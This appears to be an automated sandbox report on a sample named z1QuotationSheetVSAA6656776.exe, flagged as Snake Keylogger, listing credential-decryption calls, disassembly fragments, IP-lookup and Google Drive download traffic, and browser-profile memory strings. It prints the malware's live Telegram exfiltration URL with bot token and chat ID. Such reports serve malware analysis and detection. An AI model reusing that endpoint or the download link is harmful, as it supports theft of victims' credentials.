Source: 00000083.00000002.42927623951.0000000034CB1000.00000004.00000800.00020000.00000000.sdmp |
Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7488405197:AAH7tXu4zKMAWY-fq5Ygp2Q20mBw5pxUA68/sendMessage?chat_id=1545867115"} |
Source: z1QuotationSheetVSAA6656776.exe |
ReversingLabs: Detection: 50% |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784BBC8 CryptUnprotectData, |
131_2_3784BBC8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784C302 CryptUnprotectData, |
131_2_3784C302 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_3784C250 CryptUnprotectData, |
131_2_3784C250 |
Source: z1QuotationSheetVSAA6656776.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: unknown |
HTTPS traffic detected: 142.251.167.113:443 -> 192.168.11.20:49779 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 142.251.111.132:443 -> 192.168.11.20:49780 version: TLS 1.2 |
Source: unknown |
HTTPS traffic detected: 172.67.177.134:443 -> 192.168.11.20:49782 version: TLS 1.2 |
Source: z1QuotationSheetVSAA6656776.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00406167 FindFirstFileA,FindClose, |
0_2_00406167 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
0_2_00405705 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 0_2_00402688 FindFirstFileA, |
0_2_00402688 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00406167 FindFirstFileA,FindClose, |
131_2_00406167 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, |
131_2_00405705 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 131_2_00402688 FindFirstFileA, |
131_2_00402688 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 0016F1FEh |
131_2_0016F01B |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 0016FB88h |
131_2_0016F01B |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016E530 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016EB63 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h |
131_2_0016ED44 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841A38h |
131_2_37841620 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841471h |
131_2_378411C0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F9A7h |
131_2_3784F700 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784FDFFh |
131_2_3784FB58 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F54Fh |
131_2_3784F2A8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then mov esp, ebp |
131_2_3784DEB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784F0F7h |
131_2_3784EE50 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784E847h |
131_2_3784E5A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784EC9Fh |
131_2_3784E9F8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37840BB1h |
131_2_37840900 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 3784E3EFh |
131_2_3784E148 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841A38h |
131_2_37841966 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37841011h |
131_2_37840D60 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37840751h |
131_2_378404A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 378402F1h |
131_2_37840040 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B92E57h |
131_2_37B92BB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9B4A3h |
131_2_37B9B168 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B99E58h |
131_2_37B99BB0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B91447h |
131_2_37B911A0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9189Fh |
131_2_37B915F8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B98877h |
131_2_37B985D0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B999D7h |
131_2_37B99730 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
131_2_37B95F18 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9AFB7h |
131_2_37B9AD10 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then lea esp, dword ptr [ebp-04h] |
131_2_37B95F15 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B925A7h |
131_2_37B92300 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9841Fh |
131_2_37B98178 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B929FFh |
131_2_37B92758 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B90FEFh |
131_2_37B90D48 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B93B5Fh |
131_2_37B938B8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9AB5Fh |
131_2_37B9A8B8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9214Fh |
131_2_37B91EA8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9073Fh |
131_2_37B90498 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B99127h |
131_2_37B98E80 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B97F9Fh |
131_2_37B97CF8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B90B97h |
131_2_37B908F0 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9957Fh |
131_2_37B992D8 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B98CCFh |
131_2_37B98A28 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9A2AFh |
131_2_37B9A008 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B932AFh |
131_2_37B93008 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B9A707h |
131_2_37B9A460 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B93707h |
131_2_37B93460 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B91CF7h |
131_2_37B91A50 |
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe |
Code function: 4x nop then jmp 37B902E7h |
131_2_37B90040 |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: Joe Sandbox View |
IP Address: 158.101.44.242 158.101.44.242 |
Source: Joe Sandbox View |
IP Address: 172.67.177.134 172.67.177.134 |
Source: Joe Sandbox View |
JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: Joe Sandbox View |
JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: unknown |
DNS query: name: checkip.dyndns.org |
Source: unknown |
DNS query: name: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic |
HTTP traffic detected: GET /uc?export=download&id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: drive.google.com
Cache-Control: no-cache |
Source: global traffic |
HTTP traffic detected: GET /download?id=1fyuvEZLuSVUkG7raUlOZ4R_skUreyHKC&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Cache-Control: no-cache
Host: drive.usercontent.google.com
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1
Host: reallyfreegeoip.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: global traffic |
HTTP traffic detected: GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org |
Source: z1QuotationSheetVSAA6656776.exe, 00000083.00000002.42927623951.0000000034F59000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User 
Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":" |